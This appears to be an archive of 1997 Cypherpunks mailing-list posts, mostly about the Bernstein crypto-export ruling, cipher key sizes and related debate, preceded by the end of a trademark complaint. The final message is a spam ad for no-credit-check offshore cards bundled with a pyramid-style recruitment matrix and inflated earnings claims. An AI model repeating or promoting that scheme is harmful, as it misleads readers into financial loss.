50. Defendants' wrongful use of a substantially identical and therefore confusingly similar trademark as alleged herein is likely to deceive the public into believing falsely that there is a connection between plaintiff and defendants. Defendants have unfairly competed with plaintiff in violation of the Colorado common law. 51. As a proximate result of the acts of defendants as alleged herein, plaintiff has suffered and will continue to suffer great damage to its business, goodwill, and reputation. 52. Plaintiff has no adequate remedy at law against this unfair competition. Unless defendants are enjoined by this Court, plaintiff will continue to suffer irreparable harm. 53. In acting as alleged herein, defendants have acted with oppression, fraud, and malice toward plaintiff. Plaintiff is therefore entitled to an award of punitive damages for the sake of example and by way of punishing defendants. Fourth Cause of Action (Trademark Infringement - Colorado Common Law) 54. Plaintiff realleges and incorporate herein by reference the allegations of paragraphs 1-38 and 51-53 of the Complaint as set forth above. 55. Plaintiff has used the mark "OPPEDAHL & LARSON" for providing intellectual property information over the Internet for many years. Said mark has become extensively known and associated in the minds of the public with plaintiff's business and services. 56. Defendants have used the designation "OPPEDAHL" and "LARSON" in connection with their web pages that is confusingly similar to that created and used by plaintiff with intentional disregard of plaintiff's trademark rights. As a result of such acts, defendants are misleading the public into believing falsely that their web pages are connected with plaintiff's services, all in violation of the Colorado common law concerning the protection of trademarks. 57. As a proximate result of the acts of defendants as alleged herein, plaintiff has suffered and will continue to suffer damage to its business, goodwill, and reputation. 58. Plaintiff has no adequate remedy at law for the infringements of the mark "OPPEDAHL & LARSON" alleged herein. Unless defendants are enjoined by this Court, plaintiff will continue to suffer irreparable harm. 59. In acting as alleged herein, defendants have acted with oppression, fraud, and malice toward plaintiff. Plaintiff is therefore entitled to an award of punitive damages for the sake of example and by way of punishing defendants. WHEREFORE, Plaintiff prays for relief as follows: 1. That defendants, their officers, agents, servants, employees and representatives and all other persons, firms or corporations in active concert or participation with them, be preliminarily and thereafter permanently enjoined and restrained from: (1) using in any manner in connection with any of their web pages, or in connection with any advertising or promotions of such web pages, the names and trademarks "OPPEDAHL," "LARSON," and "OPPEDAHL & LARSON" and any colorable imitation thereof; and (2) doing any act or thing calculated or likely to cause confusion or mistake in the minds of members of the public or the trade, or prospective users of defendants' services, as to the source of services provided, produced, distributed, sold or offered for sale thereby, or likely to deceive members of the public or the trade, or prospective purchasers, into believing that there is some connection between defendants' and plaintiff or that defendants' web pages are being produced, distributed, sold or offered for sale with plaintiff's authorization; 2. That defendants, pursuant to 15 U.S.C. � 1116(a), be directed to file with this Court and serve upon plaintiff within thirty (30) days after entry of the injunction, a report in writing under oath setting forth in detail the manner and form in which they have complied with the injunction; 3. That defendants, pursuant to 15 U.S.C. � 1118, be ordered to deliver up for destruction all media, packages, wrappers, receptacles, and articles in their possession bearing the mark "OPPEDAHL," "LARSON" and/or "OPPEDAHL & LARSON," or any reproduction, counterfeit, copy, or colorable imitation thereof, and all plates, molds, matrices, and other means of making the same; 4. That defendants account for and pay over to plaintiff all of the profits realized by defendants, or others acting in concert or participation with defendant, from the sale and distribution of their services in connection with the unauthorized use of the marks "OPPEDAHL," "LARSON" and/or "OPPEDAHL & LARSON," and defendants' unfair methods of competition as alleged herein; 5. That plaintiff recover its damages sustained as a result of defendants' unfair competition and infringement of plaintiff's marks; 6. That plaintiff be awarded three times defendants' profits or three times plaintiff's damages, whichever is greater, together with its reasonable attorneys' fees pursuant to 15 U.S.C. �� 1117(a) and (b); 7. The plaintiff be awarded punitive damages pursuant to Colorado common law. 8. That plaintiff recover the costs of this action; and 9. That plaintiff be granted such other and further relief as the Court deems just and proper. OPPEDAHL & LARSON Dated: July 23, 1997 Carl Oppedahl Oppedahl & Larson 611 Main Street P.O. Box 5540 Frisco, Colorado 80443-5540 (970) 513-9950 Fax (970) 513-9948 Plaintiff Of Counsel: Marina T. Larson Stanley D. Ference III Oppedahl & Larson 1992 Commerce Street, Suite 309 Yorktown Heights, New York 10598 (914) 245-3252 Fax (914) 962-4330 Address of plaintiff: Oppedahl & Larson 611 Main Street P.O. Box 5540 Frisco, Colorado 80443-5540 From stewarts at ix.netcom.com Wed Aug 27 16:07:58 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Aug 1997 07:07:58 +0800 Subject: Forwarded mail... In-Reply-To: <199708231622.LAA24970@einstein.ssz.com> Message-ID: <3.0.2.32.19970826230148.02f656cc@popd.ix.netcom.com> At 11:22 AM 8/23/97 -0500, Jim Choate wrote: >This is only part of the story. Most persons afflicted with these sorts of >disorders are not caused by any sort of lesion but rather a geneticly based >anomaly in brain development. Dyslexia is a prime example. Dyslexia's harder to help, but in an online environment you _can_ help agraphia (or bad typing) by using spell checkers. Sure, the spell checker may occasionally miss misspelled words, and may "fix" words that were correctly spelled, but you're still probably ahead of the game. And they may not recognize "genetically" either, but it's a start. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From stewarts at ix.netcom.com Wed Aug 27 16:14:58 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Aug 1997 07:14:58 +0800 Subject: gephardt slams crypto regs In-Reply-To: <199708250116.SAA22371@netcom13.netcom.com> Message-ID: <3.0.2.32.19970826230823.02f656cc@popd.ix.netcom.com> At 06:16 PM 8/24/97 -0700, Vladimir Z. Nuri wrote: >Encryption is vital to the Net > BY RICHARD A. GEPHARDT Thanks for posting this! My hat's off to Senator Gephardt for coming out in favor of economic and personal freedom! (Of course, it's not like I'd set my hat _down_ where he could steal it or check its national origin label :-) Dick's still a statist protectionist, but even if he's doing the right thing just to annoy the right-wing statists like Clinton, it's a good start!) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From news at sldc.ffg.com Wed Aug 27 16:15:32 1997 From: news at sldc.ffg.com (news at sldc.ffg.com) Date: Thu, 28 Aug 1997 07:15:32 +0800 Subject: News from the Front (August Issue) Message-ID: An update to our customers and friends on happenings at ----------------------------------------------------------------------- F O R E F R O N T - Taking the Chaos out of the 'Net http://www.ffg.com Newsletter 8/25/97 ----------------------------------------------------------------------- Contents: I. Special Offer II. News from the 'Front III. Hot Tip ----------------------------------------------------------------------- I. Special Offer Due to the popularity of the WebBundle, we're bringing it back for a limited time. ForeFront would like to offer you, our V.I.P.'s, a chance to get ALL of our Web products (WebSeeker, WebWhacker, and WebPrinter) at a discount. Get the Web Bundle for only $89.50 for a limited time. - http://store.ffg.com/webbundle/ ----------------------------------------------------------------------- II. News from the 'Front Thanks to everyone for signing up for the Internet Research Course. ForeFront releases their second FREE e-mail course on Off-line Browsing. Sign-up for our no-cost course at http://www.ffg.com/courses WebWhacker 3.0 for Macintosh released. The worlds first off-line browser for Macintosh just got better. See the new features at: http://www.ffg.com/whacker Educational WebWhacker enters Beta! Ed Whacker brings WebWhacker 3.0 to the classroom. Whack Internet pages and share them with an entire classroom with a single click. The teacher can launch browsers on every station in the classroom with one button. Beta testers get 50% off the retail price when Ed Whacker is released. If you'd like to join the beta program, visit: - http://www.ffg.com/whacker/edwhackerbeta.html ----------------------------------------------------------------------- II. Tip o' the Day WebSeeker's Filtering is its most powerful feature. If you are looking for something very specific on the Internet, start WebSeeker and enter your keywords. Then choose "Filter Find". FilterFind is slower, but usually worth the wait. Every word on every page is indexed allowing you to quickly narrow your search. Choose the Filter button (funnel with 3 dots after it) and enter any specific query. You can use AND, OR, NOT, NEAR and other powerful features to narrow your search until you find EXACTLY what you are looking for. No other program gives you the power of a WebSeeker search. If you don't have WebSeeker 3 then try it now! - http://www.ffg.com/seeker/ If you have an earlier version of WebSeeker then upgrade now! - http://www.ffg.com/seeker/wsupgrade.html ----------------------------------------------------------------------- This newsletter is only sent to those who requested the newsletter and those who downloaded, registered, or evaluated our software. If you wish to unsubscribe from the ForeFront newsletter mailing list, please visit http://www.ffg.com/press to Unsubscribe. From zylof at rigel.cyberpass.net Wed Aug 27 16:18:54 1997 From: zylof at rigel.cyberpass.net (anonymous) Date: Thu, 28 Aug 1997 07:18:54 +0800 Subject: Freezing assets Message-ID: <199708272310.QAA01231@rigel.cyberpass.net> How does the U.S. government go about freezing the assets of foreign nationals? Which kinds of assets are the most and least amenable to freezing? By what legal and procedural mechanisms does one "freeze" the securities, real estate, etc. of foreign nationals? thanks, zylof From stewarts at ix.netcom.com Wed Aug 27 16:27:17 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 28 Aug 1997 07:27:17 +0800 Subject: PGP5i supports RSA keys? In-Reply-To: <19970817123643.13713.qmail@hotmail.com> Message-ID: <3.0.2.32.19970826232116.02f656cc@popd.ix.netcom.com> At 08:13 PM 8/24/97 -0400, Anonymous wrote: >Sorry, but computer hardware performance is increasing exponentially, >but the difficulty of factoring is subexponential in the length of the >number. Ok, it's subexponential, but not _very_ subexponential. For example, doubling the work to crack a 1024 bit key means adding about 10 bits, if I remember right; it's something like 2**N / log N or 2**(N/3) or some other relationship that's close enough to exponential in that adding a small number of bits doubles the workload, for values of "small" that mean it doesn't take you a substantially different amount of work to double the amount of work a cracker needs to do, or multiply it by 1024, or by 1048576. You can still kick the NSA's butt at the cost of going to next year's model for your palmtop, or adding a few megahertz into your Pentium, rather than needing to siphon off spare CPU cycles from Ft. Meade to make your cellphone encryption fast enough. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From dave at bureau42.ml.org Wed Aug 27 17:22:41 1997 From: dave at bureau42.ml.org (David E. Smith) Date: Thu, 28 Aug 1997 08:22:41 +0800 Subject: Crypto best book In-Reply-To: <34048792.F8463AF3@bbamerindus.com.br> Message-ID: > What is the best book about cryptography ? Although "best" is certainly subjective, Nine out of Ten Cypherpunks (TM) recommend Bruce Schneier's "Applied Cryptography." http://www.counterpane.com/applied.html dave From demara at geocities.com Wed Aug 27 17:48:00 1997 From: demara at geocities.com (Alexis) Date: Thu, 28 Aug 1997 08:48:00 +0800 Subject: hello Message-ID: <340466A5.5BFB@geocities.com> Is there anybody that can tutor me how to hack, crack, phrank, and cryptomography ( i'm not sure i speel that last part correctly. I would like to get some help, please email me back ASAP thank you so very much recall. From tc at dev.null Wed Aug 27 17:52:23 1997 From: tc at dev.null (Tenth CypherPunk) Date: Thu, 28 Aug 1997 08:52:23 +0800 Subject: Crypto best book In-Reply-To: Message-ID: <3404C5F2.6CD5@dev.null> David E. Smith wrote: > > What is the best book about cryptography ? > Although "best" is certainly subjective, Nine out of Ten Cypherpunks (TM) > recommend Bruce Schneier's "Applied Cryptography." > http://www.counterpane.com/applied.html I recommend "Cyphernomicon" by Tim C. May, which can be found by following the pointers at: http://bureau42.base.org/public/webworld TenthCypherMonger From cpunks at www.video-collage.com Wed Aug 27 17:52:27 1997 From: cpunks at www.video-collage.com (Cypherpunks Maintenance Account) Date: Thu, 28 Aug 1997 08:52:27 +0800 Subject: DoJ press release on Bernstein case (fwd) Message-ID: <199708280046.UAA19165@www.video-collage.com> ----- Forwarded message from John Gilmore ----- >From cpunks Tue Aug 26 23:08:09 1997 Message-Id: <199708270251.TAA15101 at toad.com> X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use HELO protocol To: bernstein-announce at toad.com Subject: DoJ press release on Bernstein case Date: Tue, 26 Aug 1997 19:51:24 -0700 From: John Gilmore Reply-To: John Gilmore Sender: owner-cypherpunks at toad.com Precedence: bulk Forwarded-by: Shari Steele Department of Justice For Immediate Release Tuesday, August 26, 1997 CIV (202) 616-2777 TDD (202) 514-1888 JUSTICE DEPARTMENT STILL REVIEWING DISTRICT COURT DECISION ON EXPORT CONTROLS ON ENCRYPTION SOFTWARE WASHINGTON, D.C. -- The Justice Department said today it is considering what further legal measures it will take following yesterday's ruling by the U.S. District Court in San Francisco that certain aspects of the government's regulations on the export of encryption software are unconstitutional. Another federal court upheld the export controls on encryption software. The Administration is committed to promoting the legitimate use of encryption. Through encryption--or the coding of messages--businesses can protect trade secrets, hospitals can safeguard medical records, and individuals can be assured that personal messages on the information superhighway remain private. But, as President Clinton stated upon issuing an Executive Order on this subject on November 15, 1996, the use of encryption products by unfriendly parties outside the United States can jeopardize the foreign policy and national security interests of the United States, and public safety of U.S. citizens. Judicial proceedings in Bernstein v. Department of State are not yet concluded, and the decision governs only that case. In March 1996, in another pending case in Washington, D.C., Karn v. Department of State, the District Court ruled that export controls on encryption software are constitutional under the First Amendment and serve important interests of the United States. That case is still pending to consider export controls on encryption now administered by the Commerce Department. Until this issue is resolved, export controls on encryption software remain in place. Individuals or companies wishing to export encryption software by any means must continue to adhere to applicable export licensing controls on such software before exporting it abroad. ### 97-351 ----- End of forwarded message from John Gilmore ----- From jim.burnes at ssds.com Wed Aug 27 17:53:58 1997 From: jim.burnes at ssds.com (Jim Burnes) Date: Thu, 28 Aug 1997 08:53:58 +0800 Subject: Bernstein decision In-Reply-To: <199708261343.GAA03055@toad.com> Message-ID: On Tue, 26 Aug 1997, John Gilmore wrote: > [There will be many chances to talk to the press today about this. > Call them up. Tell them what it means.] > > Lucky Green said: > > The ruling provides an interesting data point, but is inconsequential > > to the software industry. > > Jonathan Wienke said: > > The decision seems to be a step in the right > > direction, but a VERY small one. > > However you slice it, getting a Federal judge to declare both crypto > export control regimes unconstitutional is a major accomplishment. > Of course, but Commerce may keep harassing people who attempt crypto export. One thing that occurred to me was that if Commerce prosecutes everyone but Bernstein, then Mr. Bernstein could become a _very_ wealthy man. Think about it. How hard would it be to include the Snuffle algorithm in PGP, etc. How much for a Bernstein crypto license? Talk about muddying the waters. Mr Bernstein keeps upgrading his algorithm until it becomes a major portion of most crypto packages. This decision looks like the first major chink in the armor. Depending on how long it takes to free up the rest of the algorithms (if ever) Bernstein could recoup his legal investment many times over. Better yet if its public domain then everybody could include it _now_. An interesting type of virus. Jim Burnes From cpunks at www.video-collage.com Wed Aug 27 17:56:32 1997 From: cpunks at www.video-collage.com (Cypherpunks Maintenance Account) Date: Thu, 28 Aug 1997 08:56:32 +0800 Subject: CAST key size (fwd) Message-ID: <199708280047.UAA19296@www.video-collage.com> ----- Forwarded message from Peter Gutmann ----- >From cpunks Mon Aug 25 08:03:32 1997 From: pgut001 at cs.auckland.ac.nz (Peter Gutmann) To: hvdl at sequent.com Subject: Re: CAST key size Reply-To: pgut001 at cs.auckland.ac.nz X-Charge-To: pgut001 X-Authenticated: relaymail v0.9 on cs26.cs.auckland.ac.nz Date: Mon, 25 Aug 1997 23:39:58 (NZST) Message-ID: <87250919812278 at cs26.cs.auckland.ac.nz> Sender: owner-cypherpunks at toad.com Precedence: bulk >Just a quick question on the keysize of the CAST algorithm. According to >the bible of Bruce, CAST uses a 64 bit keysize, while in the manual of >PGP 5.0 (page 89), Phill states that CAST uses a 128 bit keysize... > >Am I missing something? "CAST" isn't a particular algorithm, but a design process for creating algorithms. The particular CAST instantiation used in PGP 5 is either CAST-128 or CAST5, depending on who you ask. Other versions of CAST abound, including an earlier one used by MS for unknown purposes which had a 64-bit key, probably the one Bruce is referring to. Peter. ----- End of forwarded message from Peter Gutmann ----- From cpunks at www.video-collage.com Wed Aug 27 17:58:44 1997 From: cpunks at www.video-collage.com (Cypherpunks Maintenance Account) Date: Thu, 28 Aug 1997 08:58:44 +0800 Subject: Crypto Export Restrictions are Unconstitutional (fwd) Message-ID: <199708280046.UAA19223@www.video-collage.com> ----- Forwarded message from John Gilmore ----- >From cpunks Tue Aug 26 13:46:02 1997 Message-Id: <199708261734.KAA06596 at toad.com> X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use HELO protocol To: bernstein-announce at toad.com Subject: Crypto Export Restrictions are Unconstitutional Date: Tue, 26 Aug 1997 10:34:53 -0700 From: John Gilmore Reply-To: John Gilmore Sender: owner-cypherpunks at toad.com Precedence: bulk CRYPTO EXPORT RESTRICTIONS ARE UNCONSTITUTIONAL Professor Bernstein is free to publish his software San Francisco, August 26, 1997 - The Federal District Court here struck down Commerce Department export restrictions on the privacy technology called encryption yesterday, concluding that "the encryption regulations are an unconstitutional prior restraint in violation of the First Amendment." For the first time, Judge Marilyn Hall Patel ordered the government not to prosecute or harass the plaintiff, Professor Daniel Bernstein, and those who use or publish his encryption software. The decision knocks out a major part of the Clinton Administration's effort to force companies to design government surveillance into computers, telephones, and consumer electronics. "This is wonderful news," said Prof. Bernstein. "I hope I can get some of my ideas published before they change the law again." The decision is a victory for free speech, academic freedom, human rights, and the prevention of crime. American scientists and engineers will now be free to collaborate with others in the United States and in foreign countries. This will enable them to build a new generation of tools for protecting the privacy and security of our communications. "Once again, it took a federal court to sort out technology and the Constitution," said Lori Fena, Executive Director of the Electronic Frontier Foundation, which backed the suit. "Let this decision signal the other two branches of government that when making laws pertaining to the Internet, they must honor their oaths to uphold the Constitution." The decision is strategic because the Clinton Administration has been using the export restrictions to influence domestic privacy policy. Companies that agree to build "key recovery" technology into their products are exempt from most of the restrictions. Key recovery, a follow-on to the Clipper Chip, is designed to give the government untraceable access to users' private information. The Federal District Court of the Northern District of California last December struck down the ITAR, a set of encryption restrictions enforced by the State Department. A few weeks later, the Government created virtually identical restrictions in the Commerce Department's Bureau of Export Administration (BXA). Yesterday's decision invalidates the new restrictions, stating, "the encryption regulations issued by the BXA appear to be even less friendly to speech interests than the ITAR." She warns that "the government cannot avoid the constitutional deficiencies of its regulations by rotating oversight of them from department to department," though concluding that she "does not believe that such was the intent here." "Our right to create, use, and deploy encryption come from our basic civil rights of free speech, freedom of the press, freedom from arbitrary search, due process of law, and privacy. Judge Patel has affirmed those roots in the First Amendment," philosophizes John Gilmore, Electronic Frontier Foundation co-founder. "Our Founding Fathers used encryption -- and even invented some -- and did not intend any ``crypto exceptions'' to the Bill of Rights." DETAILS OF MONDAY'S DECISION In the heart of the ruling, "The court declares that the Export Administration Regulations . . . insofar as they apply to or require licensing for encryption and decryption software and related devices and technology, are in violation of the First Amendment on the grounds of prior restraint and are, therefore, unconstitutional as discussed above, and shall not be applied to plaintiff's publishing of such items, including scientific papers, algorithms or computer programs." The Court also held that the government's licensing procedure fails to provide adequate procedural safeguards. When the Government acts legally to suppress protected speech, it must reduce the chance of illegal censorship by the bureacrats involved, for example by making the government go to a judge to decide the issue. The EAR does not require this; in fact, it precludes it. "And most important, and most lacking, are any standards for deciding an application. The EAR reviews applications for licenses ``on a case-by-case basis'' and appears to impose no limits on agency discretion." The Court dissected the export controls' exemption for printed materials at length, calling it "so irrational and administratively unreliable that it may well serve to only exacerbate the potential for self-censorship." The government's "distinction between paper and electronic publication . . . makes little or no sense and is untenable." The Court not only declared that these regulations are invalid and unenforceable, but also prevented the Government from "threatening, detaining, prosecuting, discouraging, or otherwise interfering with plaintiff or any other person described . . . above in the exercise of their federal constitutional rights as declared in this order." The immediate effect of this decision is that Prof. Bernstein may publish his encryption software, and that others may read, use, publish and review it. In addition, others in industry are studying the court's analysis, and might decide to publish their own software on the Internet as well. Pretty Good Privacy, Inc, is one such company, which believes that future courts will find Judge Patel's reasoning persuasive. "We are particularly pleased the court has reconfirmed that computer programs, like other literary works, are accorded full protection under the First Amendment," said Bob Kohn, vice president and general counsel for Pretty Good Privacy. The final form of the judgment will be negotiated between the parties, and presented to the court within a week. The government could either seek an emergency appeal of the injunction, or take up to 60 days from the entry of judgment to appeal. ABOUT THE ATTORNEYS Lead counsel on the case is Cindy Cohn of the San Mateo law firm of McGlashan & Sarrail, who is offering her services pro bono. Major additional legal assistance is being provided by Shari Steele of the Electronic Frontier Foundation; Lee Tien of Berkeley; James Wheaton and Elizabeth Pritzker of the First Amendment Project in Oakland; and Robert Corn-Revere of the Washington, DC, law firm of Hogan & Hartson. ABOUT THE ELECTRONIC FRONTIER FOUNDATION The Electronic Frontier Foundation (EFF) is a nonprofit civil liberties organization working in the public interest to protect privacy, free expression, and access to online resources and information. EFF is a primary sponsor of the Bernstein case. EFF helped to find Bernstein pro bono counsel, is a member of the Bernstein legal team, and helped to collect members of the academic community and computer industry to support this case. Full text of the lawsuit and other paperwork filed in the case is available from EFF's online archives at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Scanned images of Monday's decision are available at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Legal/970825_decision.images/ The full text of Monday's decision will soon be available at: http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/ Legal/970825.decision Professor Daniel Bernstein will be building his new Constitutionally- protected cryptography web page at: http://pobox.com/~djb/crypto.html Electronic Frontier Foundation Contacts: Shari Steele, Staff Attorney 301/375-8856, ssteele at eff.org John Gilmore, Founding Board Member 541/354-6541, gnu at toad.com Cindy Cohn, McGlashan & Sarrail 415/341-2585, cindy at mcglashan.com ----- End of forwarded message from John Gilmore ----- From cpunks at www.video-collage.com Wed Aug 27 18:01:08 1997 From: cpunks at www.video-collage.com (Cypherpunks Maintenance Account) Date: Thu, 28 Aug 1997 09:01:08 +0800 Subject: Bernstein decision is out! (fwd) Message-ID: <199708280046.UAA19252@www.video-collage.com> ----- Forwarded message from John Gilmore ----- >From cpunks Tue Aug 26 09:26:49 1997 Message-Id: <199708261312.GAA02742 at toad.com> X-Authentication-Warning: toad.com: Host localhost [127.0.0.1] didn't use HELO protocol To: bernstein-announce at toad.com, gnu at toad.com Subject: Bernstein decision is out! Date: Tue, 26 Aug 1997 06:12:24 -0700 From: John Gilmore Reply-To: John Gilmore Sender: owner-cypherpunks at toad.com Precedence: bulk Judge Patel has made her decision, and it is up on the Web at http://www.eff.org/. We're still preparing the legal analysis, but the basic outline is that she declares the Commerce Dept. export-control scheme unconstitutional. She also issued an injunction against the Commerce Dept. preventing them from enforcing these regulations against Prof. Bernstein or others who distribute his software. More details later... John Gilmore ----- End of forwarded message from John Gilmore ----- From kent at songbird.com Wed Aug 27 18:07:44 1997 From: kent at songbird.com (Kent Crispin) Date: Thu, 28 Aug 1997 09:07:44 +0800 Subject: heart In-Reply-To: <199708271649.MAA09156@www.video-collage.com> Message-ID: <19970827174950.35762@bywater.songbird.com> On Wed, Aug 27, 1997 at 12:49:42PM -0400, Sean Roach wrote: > At 11:55 PM 8/26/97 -0700, Kent Crispin wrote: [...] > > Pretty soon every revolver will have a warning label. "Warning, misuse of > this tool can result in injury and death. By handling this item you consent > to bear all legal responsibility reguarding its use." Never mind that such > should be implied. Product liability issues are more prominent when something doesn't function as it is supposed to -- say you are trying to defend yourself against a thief, and the gun blows up in your face. This is not the same as assuming legal liability for when you shoot someone. Arguably, even then you should not be able to sue -- the small aircraft industry has been decimated by product liability issues. And I remember when Chouinard went out of the climbing equipment business because of threat of lawsuits. My understanding is that warning labels -- even signed liability releases -- are of limited use in these cases, because, while you can sign a binding contract that limits your ability to sue, you cannot so bind your survivors. -- Kent Crispin "No reason to get excited", kent at songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From blancw at cnw.com Wed Aug 27 18:17:52 1997 From: blancw at cnw.com (Blanc) Date: Thu, 28 Aug 1997 09:17:52 +0800 Subject: Stewart Baker on Bernstein encryption decision (fwd) Message-ID: <3.0.32.19970827181010.00a72d74@cnw.com> V.Z.Nuri wrote, in reaction to Stewar Baker's message: >*spit* [...] fraudulent camel's back. soon let the whole corrupt >structure fall like the rotten house of cards that it is. [...] >SOME PEOPLE JUST DON'T GET IT, even as they >wallow daily in their own hypocrisy. > >[...]the horrid and repulsive episode [...] >when in the course of human events it become necessary to expunge a >parasite... [...] >(if so, it would be the one of the least vile and sleazy tactics employed >so far in the whole sorry affair.) > >[...] sarcastic contempt I feel for you and your despicable cohorts [...] .......................................... Like, have you tried to export software lately, L.D.? You're taking this rather personally. Your heart-felt, warm&fuzzy message to Mr. Baker, who doesn't know you from anyone (except that you posted from that scum-bag pot of cypherpunk-infestation (those poisonous tentacles of Medusa), I'm sure will instill in him a deep regret for his past attitude; he'll probably recant his past, become a born-again Christian, and join the list. Eloquent, informative statements from other noteworthy representatives of the technology industry, spoken even at meetings where Mr. Baker was personally present, and even directly to him by the likes of TCM, could not, I'm sure be as persuasive as the *spit*ting and lowly modifying terms which you slew in his direction. An intellectually uplifting debate on the subject, bringing into view incontestable points of fact, could not surely be as convincing as this upchuck of verbiage from deep within yourself, where you keep your stash of special words selected for their ability to clarify difficult issues. Goodness, next you'll be agreeing with TCM that "they should all be nuked". You might even begin consider a special venue for achieving this, such as.........Blacknet? .. Blanc From jsmith58 at hotmail.com Wed Aug 27 18:18:04 1997 From: jsmith58 at hotmail.com (John Smith) Date: Thu, 28 Aug 1997 09:18:04 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <19970828011033.10773.qmail@hotmail.com> William H. Geiger III: >In the Salem witch trial they were government trials (which were >based on >a political power struggle in Salem at the time) not lynch mobs. And how about our gun-crazy friend, who'd shoot anybody who messed with him, his family, or his property. What do you think he's going to do when that witch down the street puts a hex on his cow and it dies? Sounds to me like we've got another shooting coming. Is that the kind of world you want to live in? "John ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com From anon at anon.efga.org Wed Aug 27 18:36:09 1997 From: anon at anon.efga.org (Anonymous) Date: Thu, 28 Aug 1997 09:36:09 +0800 Subject: Socio-Economic Cults (Re: Cypherpunk Cults) Message-ID: <4624afc117cc70ecd2729a840f5d3e21@anon.efga.org> -----BEGIN PGP SIGNED MESSAGE----- Sean Roach wrote: >>Afterwards, a compensation arrangement is made between your >>protection company and the protection company of your victim. >Also, according to what I remember, the "protection company" was your >extended family. Pay up or face the wraith of all the deceased's >cousins, nephews, uncles, neices, aunts, maybe his kids. This seems to have been a common case, but it was not the rule. There were a limited number of franchises available for protection companies. Protection franchises were bought and sold like any other business. Like businesses, some did well and grew in size and value under the care of their stewards and others did not. The ability to change protection companies at will is important - it's what distinguishes this system from feudal "protection" systems where the "clients" are actually serfs. The Icelandic idea of the extended family did not map precisely to ours. Divorces were easily and commonly arranged. There was a lot of turnover and a lot of half-siblings around. There were some interesting adoption customs, too. People sometimes adopted children they liked, even if the parents were still living. This did not mean that the children didn't continue to live with the natural parents. But the adopting parent would help out here and there. (In "Njal's Saga", for example, an adopting parent beats up people for his adopted daughter and this causes no end of trouble.) Just Another Cypherpunk -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBNASrX/+1rw4IkyBFAQGkcgf/UPot2diIVhohhip4CQDpUnGdZZA9TCK6 OPAsNb01CekDk8fv0SThudb9jSf5/QFEkZ6OM/ts2f5hbpxwGx6zC+sMJ9oo+LsI 4odgrR2lbwdikgMBDoJ3FcJMOF9bKLnUPYBUUc/RwPP0b7Jj8FEfDxURu+yHAUR7 VRRxmtyWMHSp7j+2Ngz8Idu7CJHqUfekcuSdPKank3QaXO9nEDDnWsoWK94UWBrh ZJPYo1D1TgdP/0LxjoU4FH2Tq9AZYVrZ8jxXxDShzS2mVR9jhGu31HBcQ/povEYC w/BoG/6kA59bmfvV8odU/q5CM9vFuJmLb8Swtc7YZXal5a6v2KX5+g== =MFgT -----END PGP SIGNATURE----- From guaranteedcredit at aol.com Thu Aug 28 10:17:23 1997 From: guaranteedcredit at aol.com (guaranteedcredit at aol.com) Date: Thu, 28 Aug 1997 10:17:23 -0700 (PDT) Subject: $5000 of Credit GUARANTEED - NO CREDIT CHECK/NO SSN REQUIRED Message-ID: <3400A716DD1@aol.com> If not interested, then please delete this message. $5000 WORTH OF CREDIT GUARANTEED!! * You Receive 2 Major Offshore Credit Cards! * A total of $5,000 worth of Credit @ 4.95% APR AND... * (optional) $10,000 - $15,000 Line of Credit (5.95% APR)!!! * Line of Credit could expand after 6 months to $25,000-$100,000!!! * NO Credit Check or Income Verification! * NO Social Security Number Required! * NO Deposits or Collateral Funds (Unsecured)!! * Bad Credit, No Credit, Bankruptcy, NO PROBLEM!!! * 3 x 6 forced matrix could earn you $6,941 (or more) per month!! * Complete Financial Privacy! * You will receive a $25 BONUS CHECK for every person that you personally sponsor. PAID WEEKLY!!! * Matrix participants will receive monthly commissions for all participants in your downline. IT'S EASY TO APPLY! Simply email to our autoresponder: offshorecard1 at answerme.com and complete the Request Form with a payment in international money order of only $100.00. When you choose us to help you get an Offshore Card you're automatically put into a 3 x 6 forced matrix (forced meaning that if you fill one level, every person that signed up under your automatically goes on to fill your next level, and so on) could earn you $6941.00 per month! You will be paying $25 per month in dues to the club for services rendered. This $25 will be DEBITED EACH MONTH from your account, and will allow you to receive commission checks for the banking activities of every person in your downline! Matrix participants are recruited through a network of distributors worldwide. Participants earn monthly commissions on the dues ($25) paid by every member in good standing under them in a 3x6 forced matrix. Monthly commission schedule is as follows: Level 1 - 0% ($1.25) times 3 referrals on this level...[3x$0]..........$0.00 Level 2 - 10% ($2.50) times 9 referrals on this level....[9x$5].......$22.50 Level 3 - 5% ($1.25) times 27 referrals on this level....[27x$1.25].$33.75 Level 4 - 10% ($2.50) times 81 referrals on this level..[81x$2.50]..$202.50 Level 5 - 20% ($5.00) times 243 referrals on this level.[243x$5.00].$1215.00 Level 6 - 30% ($7.50) times 729 referrals on this level.[729x$7.50].$5467.00 Total: $6941.25 Per Month!! (referrals are the number of people underneath you in the matrix; a combination of the people you refer, and the people they refer, etc.) All the money earned as a result of matrix participation is deposited AS A PAYMENT to the member's credit card account! If their commissions exceed the minimum monthly payment, no further payments are required that month. (i.e. enroll 3 people in a month and you will more than likely have covered your minimum payment for anything you charge that month, just from the enrollee's bonuses! Develop a large downline, and your entire monthly charges could be ZEROED OUT each month!), or better yet, you will receive $6941.00 CREDIT in your account!! NO REPORTING OF YOUR CARD ACTIVITY TO CREDIT BUREAUS: 